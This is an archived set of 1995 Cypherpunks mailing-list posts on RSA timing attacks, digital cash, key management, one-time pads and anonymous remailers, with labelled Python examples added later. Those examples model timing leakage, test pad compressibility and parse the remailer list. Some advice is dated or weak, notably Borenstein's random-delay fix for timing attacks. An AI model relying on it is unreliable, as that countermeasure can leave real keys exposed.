> faster mod function :-).

Careful.  Even if you can make the number of executed instructions the
same, you still have to worry about timing differences due to branches
and the way the hardware multiplier handles different operands.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@netscape.com
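
[Added example, not part of the thread and not code from any poster or from the paper.] It illustrates the point in the PK> excerpt quoted by Bill Stewart and Tom Weinstein's caution above: performing the multiply for every exponent bit equalises the operation count, but data-dependent work inside each multiplication still varies with the message. Assumptions: Montgomery multiplication's conditional final subtraction stands in for "operand-dependent hardware timing", and the modulus, exponents and messages are constructed toy values.

```python
"""Counts multiplications and data-dependent reductions in modular
exponentiation; the counts stand in for what a stopwatch would see."""
import random

# Constructed toy modulus (not from the thread): the product of the
# Mersenne primes 2^61-1 and 2^31-1. Real moduli are far larger.
N = (2**61 - 1) * (2**31 - 1)
K = N.bit_length()
R = 1 << K                       # Montgomery radix, R > N
N_PRIME = pow(-N, -1, R)         # -N^-1 mod R, needed by the reduction

# Constructed 64-bit exponents with different Hamming weights.
SPARSE = 0x8000000000000001      # two bits set
DENSE = 0xFFFFFFFFFFFFFFFF       # all 64 bits set
MIXED = 0xC3A5F00F9966AA55       # roughly half the bits set

# Constructed messages from a fixed seed so the run is repeatable.
_rng = random.Random(1995)
MESSAGES = [_rng.randrange(2, N) for _ in range(32)]


class Cost:
    """Work performed by one exponentiation."""

    def __init__(self):
        self.multiplies = 0
        self.extra_reductions = 0


def mont_mul(a, b, cost):
    """Return a*b/R mod N and record whether the final subtraction ran."""
    t = a * b
    m = ((t & (R - 1)) * N_PRIME) & (R - 1)
    u = (t + m * N) >> K         # exact division: t + m*N is a multiple of R
    cost.multiplies += 1
    if u >= N:                   # operand-dependent step
        u -= N
        cost.extra_reductions += 1
    return u


def modexp(base, exponent, always_multiply=False):
    """Left-to-right square-and-multiply; returns (result, Cost)."""
    cost = Cost()
    x = (base * R) % N           # base in Montgomery form
    acc = R % N                  # 1 in Montgomery form
    for bit in bin(exponent)[2:]:
        acc = mont_mul(acc, acc, cost)
        if bit == "1":
            acc = mont_mul(acc, x, cost)
        elif always_multiply:
            mont_mul(acc, x, cost)   # dummy multiply, result discarded
    return mont_mul(acc, 1, cost), cost   # leave Montgomery form


def multiply_counts(always_multiply):
    """Multiplications for (SPARSE, DENSE) on one fixed message."""
    m = MESSAGES[0]
    return tuple(modexp(m, e, always_multiply)[1].multiplies
                 for e in (SPARSE, DENSE))


def reduction_counts(exponent=MIXED):
    """Extra reductions per message with the multiply always performed."""
    return [modexp(m, exponent, True)[1].extra_reductions for m in MESSAGES]


if __name__ == "__main__":
    print("plain multiplies   (sparse, dense):", multiply_counts(False))
    print("always-multiply    (sparse, dense):", multiply_counts(True))
    counts = reduction_counts()
    print("extra reductions across messages: min", min(counts),
          "max", max(counts))
```

The first two lines of output show the exponent-dependent count disappearing once the multiply is unconditional; the third shows the per-message spread that remains.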




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Donelan <SEAN@SDG.DRA.COM>
Date: Mon, 11 Dec 1995 16:59:51 +0800
To: cypherpunks@toad.com
Subject: Questions for Mark Twain Banks
Message-ID: <951211023756.e5b@SDG.DRA.COM>
MIME-Version: 1.0
Content-Type: text/plain


The St. Louis Internet Users Group is doing a meeting on digital cash
on Monday, Dec. 11.  Since Mark Twain Banks is located in St. Louis,
they've been invited to send a few speakers on the topic.

Any choice questions?
-- 
Sean Donelan, Data Research Associates, Inc, St. Louis, MO
  Affiliation given for identification not representation




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 12 Dec 1995 05:53:30 +0800
To: Anonymous <anon-remailer@utopia.hacktic.nl>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl>
Message-ID: <30CC0D31.293C@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> So while this is a very nice piece of work, and certainly of
> theoretical interest, I don't think it will modify the way in
> which people are advised to utilize cryptographic software, or
> cause companies like Netscape or RSADSI to shed any tears.

  While an exploit of this attack against our software has not
been demonstrated, and there is some debate about whether it
will even work, we are taking it very seriously.  We've been
working with Paul to develop a fix, which we will implement
even if the attack is never proven effective against our software.

	--Jeff

PS - I think Paul was a bit surprised when Jim Barksdale pulled
out his wallet and handed him 10 crisp $100 bills.  :-)
-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Don M. Kitchen" <don@wero.byu.edu>
Date: Mon, 11 Dec 1995 22:57:21 +0800
To: cypherpunks@toad.com
Subject: [Noise] A vaguely humorous post
Message-ID: <199512111002.DAA00907@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I saw some fool posting to alt.security among other places trying to
get his basic program to do OTP's. On the off chance that anybody
thinks this is funny, here's my response:

In-reply-to: spy@vs.spy's message of 10 Dec 1995 05:02:17 GMT
Newsgroups: alt.2600,alt.2600.programz,alt.security
Followup-To: alt.2600
Subject: Re: HELP....This will not work; I am perplexed.
Reply-to: don@cs.byu.edu
References: <4adpkp$3id@mercury.initco.net>
- --text follows this line--

> 60  INPUT "HOW MANY ONE TIME PADS DO YOU WANT?";NUMB
[snip]
> 160 RANDOMIZE E
> 170 X=INT(RND(0)*90)+1

This isn't sci.crypt so I won't flame, but I feel I should point out
that "One Time Pad" is a registered trademark of Cypherpunks, Ltd, and
that any inferrence that anything coming out of a basic randomizer is
"One", "Time", or "Pad" is a blatent trademark violation.

As a courtesy to the public, Cypherpunks, Ltd, makes freely available it's
patented One Time Pad technology. Using PGP, you may enter the top-secret
activation code thusly: "pgp +makerandom=[size] [filename]" where [size] is the
size, in bytes, of your Cypherpunk[tm]-generated, super-cryptographically-
secure, ultimate One Time Pad[tm], and [filename] is where you want it
stored. You can rest assured that with your cypherpunk[tm] One-Time-Pad[tm],
not even a Cypherpunk[tm] can break your code without breaking your bones.

> **Have you been compromised?  If the answer is no,
>  you had better think again.

With security ideas like that, I'm not surprised. MD5 man, MD5.

PS, try to zip a large output from pgp makerandom. Now try a large output
from basic. Hmmmm. Which one Just Wont Compress[tm]?

Happy Monday everyone.

PS: got mail crypt working, it's awesome. It's quite seamless, up to the
point where my home box doesn't have incoming mail service and EMACS
doesn't have built in POP or IMAP. (Yet).  But great for nntp and PGP.

Don
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMMwBmcLa+QKZS485AQHKLAL6Ah4881dbMan91wNL2TJjvGMHe75Xwzrw
YI0x5/XsmuoYv7M6qn4O+MZ9vEF51ES1sJaW5bOQ5Gq0vJn2bmGVIV+kmbn2p3TZ
ZHxkv51NW7zxwRgyvnezwyYwBrY10bQ2
=eoAc
-----END PGP SIGNATURE-----

-- 
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *
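
[Added example, not part of the post and not Don's code.] It runs the "zip test" from the PS above on three constructed pads and shows why the test can only reject a pad, never approve one. Assumptions: Python's seeded generator stands in for the BASIC RND of the quoted line 170, and os.urandom stands in for "pgp +makerandom"; the seed and pad length are constructed values.

```python
"""The compression check from the post, and why it is only a smoke test."""
import math
import os
import random
import zlib
from collections import Counter

PAD_LEN = 100_000                # constructed pad size in bytes


def basic_style_pad(seed, length=PAD_LEN):
    """Bytes built like the quoted line 170, X=INT(RND(0)*90)+1.
    Assumption: Python's seeded generator stands in for the BASIC one."""
    rng = random.Random(seed)
    return bytes(int(rng.random() * 90) + 1 for _ in range(length))


def seeded_byte_pad(seed, length=PAD_LEN):
    """Full-range bytes that are still a pure function of one seed."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(length))


def os_pad(length=PAD_LEN):
    """Bytes from the operating system's CSPRNG."""
    return os.urandom(length)


def compression_ratio(data):
    """Compressed size divided by original size (1.0 means no gain)."""
    return len(zlib.compress(data, 9)) / len(data)


def entropy_bits_per_byte(data):
    """Empirical Shannon entropy of the byte histogram."""
    total = len(data)
    return -sum(n / total * math.log2(n / total)
                for n in Counter(data).values())


def report(seed=42):
    """Return {name: (compression ratio, entropy in bits per byte)}."""
    pads = {
        "basic_style": basic_style_pad(seed),
        "seeded_bytes": seeded_byte_pad(seed),
        "os_urandom": os_pad(),
    }
    return {name: (round(compression_ratio(d), 3),
                   round(entropy_bits_per_byte(d), 3))
            for name, d in pads.items()}


if __name__ == "__main__":
    for name, (ratio, bits) in report().items():
        print(f"{name:13s} ratio={ratio:.3f} entropy={bits:.3f} bits/byte")
    # Same seed, same "pad": incompressible output is not unpredictability.
    print("seeded pad repeats:", seeded_byte_pad(42, 16) == seeded_byte_pad(42, 16))
```

The 1..90 pad compresses because it uses only 90 of 256 byte values; the seeded full-range pad does not compress, yet anyone who learns the seed regenerates it exactly.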




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 12 Dec 1995 11:35:46 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] Is it possible?
In-Reply-To: <Pine.LNX.3.91.951210113717.31381A-100000@micro.internexus.net>
Message-ID: <199512110846.DAA15037@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Laszlo Vecsey writes:
> How can I be sure that the source has not been modified from the original 
> distribution before it is compiled?

It helps to be Ken Thompson....

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 12 Dec 1995 11:35:26 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] anti-copy
In-Reply-To: <199512101537.KAA04258@detroit.freenet.org>
Message-ID: <199512110852.DAA15235@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Did someone just publish the list address in a newspaper again ?  It seems
to be one of those days....

Daark writes:
> How would it be possible to create files that KNOW they are 
> a copy?  

It's not, to the great dismay of the Software Publishers Association (or 
whatever they're called).

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 12 Dec 1995 11:35:27 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: More elveator problem
In-Reply-To: <199512110720.BAA04212@UNiX.asb.com>
Message-ID: <199512110904.EAA15250@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


The cypherpunk formerly known as Deranged Mutant writes:
> Wait... are unique IDs secret from others? Can they share theirs with
> ea. other without compromising something?
> 
> Maybe using a hash of their combined secret ideas (adding them, or
> mixing the bits... how long is the unique ID?) can be used to generate
> a "key" to exchange other information....

The fundamental problem is that Eve and her sisters get to hear both IDs
when Alice and Bob exchange them. So Eve can also do the hash, XOR, or
whatever. DH skirts this obstacle brilliantly.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 12 Dec 1995 06:48:59 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: More FUD from First Virtual
In-Reply-To: <199512110750.XAA11161@ix2.ix.netcom.com>
Message-ID: <0kn1Q6CMc50e02irtU@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.limbo: 10-Dec-95 Re: More FUD from First Vir.. Bill
Stewart@ix.netcom.c (1289*)

> At 08:51 AM 12/10/95 -0500, Nathaniel Borenstein <nsb@fv.com> (Tense Hot
> Alien In Barn) wrote:

> >In any event, I could write a virus that sits in
> >front of the e-cash program and steals your keys when next you run the
> >e-cash program.  Software's just too easy to fool.  That's why I regard
> >the risk of catastrophe as being fairly large in software-based e-cash
> >schemes.

> How is this different for an ecash program vs. a First Virtual email
> acknowledgement program, where either a (really hairy) virus, or, 
> more practically, an active email interloper could fake FV acks?  

It's fundamentally different because FV (unlike all the other systems,
to my knowledge) is a "closed loop" financial instrument.  By this I
mean that it doesn't depend on a one-way passage of some kind of
credentials to consummate a transaction.  It would be almost equally
easy to write a keyboard virus that intercepted your FV-ID as it would
be to write one that intercepted your e-cash keys, but then there would
be a pretty significant additional layer for the seamless interception
and response to the confirmation email.  (Note the "seamless" here.  If
you do it in such a way that it interferes with the user's normal mail,
it will be caught pretty quickly.)  Also, the "almost equally easy"
refers to the fact that FV-ID's are free-form text, a very deliberate
design decision that makes them far harder to sniff, even at the
keyboard level,  than credit card numbers (which are self-identifying),
although a good e-cash system will share this quality for its pass
phrases.

> While hardware may be the best encryption solution for the average user
> (as you say, and I think I agree with you), it needs to have some password
> interface such as a small keypad on the front of the smartcard, to prevent
> its usability after theft.

Right, absolutely.  But in this case, a virus still can't fake what's on
the hardware.

> Of course, there are problems with digicash as well; my Digicash play-money
> account thinks it's empty (in spite of having half a dozen coin-looking files),
> and doesn't recognize any of the half-dozen passwords I've guessed I might have
> used with it, so I'm not able to use Sameer's digicash-powered remailer.

And you're a *sophisticated* user, right Bill?  This just underscores
some other comments I've made in the past about Joe Sixpack.  I think
there will be serious usability problems.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 12 Dec 1995 05:33:24 +0800
To: Adam Shostack <ecarp@netcom.com
Subject: Usability of Cryptography (was Re: More FUD from First Virtual)
In-Reply-To: <199512102134.PAA19064@khijol>
Message-ID: <Ikn1ZhGMc50eA2iscn@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.nonpersonal: 10-Dec-95 Re: More FUD from First Vir..
"Ed Carp"@netcom.com (5360)

>  IMO, taking 
> the complexity out of the key management process will almost 
> certainly lead to designers and programmers making bad decisions 
> about how the process should work

This is exactly right.  In fact, it isn't even just bad programmer
decisions; some of the complexity is really inherently needed for
security.  PGP's notion of who you trust to certify keys, for example,
confuses the heck out of naive users, who want to "trust" anyone they
believe is a good person, not just people they believe are sophisticated
enough to sign keys.  It's really hard to explain to some people why
they should say, "No, I don't trust Grandma."

What a lot of people don't seem to realize is that, in crypto software,
there is a fundamental tradeoff between usability and security.  You can
simplify PGP (or similar software) to the point where it's easy to deal
with key management, but it will then be far more susceptible to
compromise.

Key management is the Achilles heel of crypto-for-the-masses.  I know
there are some people who want to shoot the messenger, and who think
that by stating this fact, I am declaring myself an opponent of
cryptography, but the fact is that my company has been using PGP very
heavily internally for almost 2 years, and we think we've managed our
keys securely, but it has taken a lot of effort and user education.  The
experience has left us more skeptical than ever about secure key
management by and for millions of non-technical customers.
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 12 Dec 1995 06:04:47 +0800
To: "Joseph M. Reagle Jr." <cypherpunks@toad.com
Subject: Re: .PWL spin
Message-ID: <2.2b8.32.19951211114417.0088297c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:12 PM 12/9/95 -0500, Joseph M. Reagle Jr. wrote:

>        So now, I don't even bother with that, I'm just hoping securdrv,
>sfs, or something makes it to W95 one of these days... (I doubt either of
>those will make it...)

SecureDrive works under Windows 95 if you disable all 32-bit disk drivers. 

Control Panel
System
Performance
File System
Troubleshooting
Disable all 32 bit protected mode disk drivers

You have to run SECTSR before starting Win95.  A pain but it does work.

I will be working on figuring out how to force Windows 95 to disable 32 bit
access for just my SecureDrive disk alone.  Should be possible.

DCF

"Windows 95 beats having a personal life."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 12 Dec 1995 05:55:39 +0800
To: Frank Stuart <jsw@netscape.com
Subject: Re: Netscape announces position against GAK
Message-ID: <2.2b8.32.19951211114432.00897dec@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:59 PM 12/9/95 -0600, Frank Stuart wrote:
>To avoid just saying "me too", I'll throw out another idea on making the U.S.
>version of Netscape available to U.S. users over the Internet.  How about a
>phone number to call to get an access id of some sort that can be used to
>FTP the software. 

As a deep cover agent for Icelandic Intelligence, I wandered down to my
local Babbages this weekend and bought (for cash) a copy of the US version
of the Netscape Browser.  The $6/hour clerk did not ask for my passport (or
birth certificate plus government photo ID).  For Netscape's (and Babbages')
sake, I hope the Feds don't find out.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 12 Dec 1995 06:23:57 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199512111450.GAA10737@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reorder";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo hroller c2)
(flame hacktic replay)
(wmono spook)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Last update: Mon 11 Dec 95 6:49:36 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
portal   hfinney@shell.portal.com         #+*########*      :44  99.85%
hacktic  remailer@utopia.hacktic.nl       ******* ****     7:17  99.72%
c2       remail@c2.org                    *++-.-++ +++    47:37  99.65%
rmadillo remailer@armadillo.com           ++++++++ +++    38:51  99.38%
amnesia  amnesia@chardos.connix.com       -+- -+ +--+   1:55:48  99.36%
flame    remailer@flame.alias.net         * *** * ****    19:31  99.30%
spook    remailer@valhalla.phoenix.net    ..-*  ******    53:58  99.08%
extropia remail@extropia.wimsey.com       ---.- -.---   6:49:13  98.44%
shinobi  remailer@shinobi.alias.net       + --- -- - +    53:31  98.38%
ecafe    cpunk@remail.ecafe.org             ### ##-##      2:18  98.11%
wmono    wmono@valhalla.phoenix.net        *    **  **    12:36  98.07%
mix      mixmaster@remail.obscura.com     .-__ _-__.   27:56:43  97.91%
replay   remailer@replay.com              *   + +** **     5:41  97.69%
gondolin mix@remail.gondolin.org              - --_.-  10:47:46  97.00%
vishnu   mixmaster@vishnu.alias.net        *#**      #     5:26  96.37%
alumni   hal@alumni.caltech.edu             *#     # #     1:20  96.28%
bsu-cs   nowhere@bsu-cs.bsu.edu            ##   #  # #      :15  95.56%
ford     remailer@bi-node.zerberus.de     ---._...--   15:06:29  94.28%
hroller  hroller@c2.org                   ####*+### -#     5:21  94.25%
rahul    homer@rahul.net                  ** +* *+**+*     4:32  99.67%
penet    anon@anon.penet.fi                -    . --   13:10:01  83.74%
robo     robo@c2.org                          #-##         5:59  52.62%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien
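
An added example, not part of the original post or of premail: one way to read the listing above and pick a chain in which every hop supports PGP and no two hops come from the same "sharing a machine or operator" group. The sample lines are copied from the listing; the function names, the greedy uptime ranking and the 95% uptime floor are assumptions made for illustration.

```python
import re
from dataclasses import dataclass
from typing import Optional

# A subset of the listing above, copied verbatim to keep the example short.
LISTING = r'''
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
(robo hroller c2)
(flame hacktic replay)
(wmono spook)
(alumni portal)
portal   hfinney@shell.portal.com         #+*########*      :44  99.85%
hacktic  remailer@utopia.hacktic.nl       ******* ****     7:17  99.72%
c2       remail@c2.org                    *++-.-++ +++    47:37  99.65%
flame    remailer@flame.alias.net         * *** * ****    19:31  99.30%
spook    remailer@valhalla.phoenix.net    ..-*  ******    53:58  99.08%
wmono    wmono@valhalla.phoenix.net        *    **  **    12:36  98.07%
replay   remailer@replay.com              *   + +** **     5:41  97.69%
alumni   hal@alumni.caltech.edu             *#     # #     1:20  96.28%
hroller  hroller@c2.org                   ####*+### -#     5:21  94.25%
robo     robo@c2.org                          #-##         5:59  52.62%
'''

CONFIG_RE = re.compile(r'^\$remailer\{"([^"]+)"\}\s*=\s*"<([^>]+)>\s*([^"]*)";$')
GROUP_RE = re.compile(r'^\(([^)]+)\)$')
STATS_RE = re.compile(r'^(\S+)\s+\S+@\S+\s.*\s([\d.]+)%$')


@dataclass
class Remailer:
    name: str
    address: str
    flags: set
    key_id: Optional[str]  # None when the remailer does not support PGP
    uptime: float = 0.0


def parse_listing(text):
    """Return ({short name: Remailer}, [set of names sharing a machine/operator])."""
    remailers, groups = {}, []
    for line in (raw.strip() for raw in text.splitlines()):
        m = CONFIG_RE.match(line)
        if m:
            name, address, opts = m.groups()
            flags = set(opts.split())
            key_id = None
            if "pgp." in flags:      # trailing period: key ID is the short name
                flags.discard("pgp.")
                flags.add("pgp")
                key_id = name
            elif "pgp" in flags:     # otherwise the key ID is the full address
                key_id = address
            remailers[name] = Remailer(name, address, flags, key_id)
            continue
        m = GROUP_RE.match(line)
        if m:
            groups.append(set(m.group(1).split()))
            continue
        m = STATS_RE.match(line)
        if m and m.group(1) in remailers:
            remailers[m.group(1)].uptime = float(m.group(2))
    return remailers, groups


def build_chain(remailers, groups, hops, min_uptime=95.0):
    """Greedy pick by uptime; reject a hop that shares a group with a chosen hop."""
    def shares_group(a, b):
        return any(a in g and b in g for g in groups)

    ranked = sorted((r for r in remailers.values()
                     if r.key_id and r.uptime >= min_uptime),
                    key=lambda r: r.uptime, reverse=True)
    chain = []
    for cand in ranked:
        if all(not shares_group(cand.name, hop.name) for hop in chain):
            chain.append(cand)
        if len(chain) == hops:
            return chain
    raise ValueError("not enough independent PGP-capable remailers for %d hops" % hops)


REMAILERS, GROUPS = parse_listing(LISTING)

if __name__ == "__main__":
    for hop in build_chain(REMAILERS, GROUPS, 4):
        print(hop.name, hop.key_id, hop.uptime)
```

With this subset only four independent hops exist, so asking for five raises an error rather than quietly reusing an operator.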




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 12 Dec 1995 05:10:34 +0800
To: tomw@netscape.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl>
Message-ID: <0kn1kjCMc50e02ivZP@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey, don't go for constant time, that's too hard to get perfect.  Add a
*random* delay.  This particular crypto-flaw is pretty easy to fix. 
(See, I'm not *always* arguing the downside of cryptography!)

It is worth noting, however, the extent to which "secure" cryptographic
protocols keep needing to get fixed one last time....  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 12 Dec 1995 14:20:43 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: GAK and self-incrimination?
In-Reply-To: <199512110749.XAA11099@ix2.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.951211070718.10531C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995, Bill Stewart wrote:

> At 02:57 AM 12/10/95 -0800, you wrote:
> >The Fifth protects you against *compelled* self-incrimination - in
> >particular, the right to be free from the "cruel trilemma" of
> >
> >        o       conviction of a substantive crime, based on your
> >                (true) testimony
> >        o       conviction of perjury, for lying when asked to incriminate
> >                yourself
> >        o       contempt of court sanctions, for refusing to answer
> 
> Testimony was often compelled by more direct means than threatened
> contempt citations.  Piling rocks on people until they talked was
> still in use in the 1600s, unless I've got my dates wrong.

And later.

The term 'pressing a defendant for a plea' came from the practice of 
piling heavy weights on a defendant and 'pressing' him into the very 
floor of the court. (As defendants who did not admit a plea would save 
their family from being held accountable to judgment, the incentive to 
remain silent was high).  Often weight was piled atop the hapless 
defendant until he or she expired, having refused to enter a plea.

> It may have gone out of fashion slightly after witch-burning,
> but was still in recent cultural memory of the Constitution's authors.
> #--
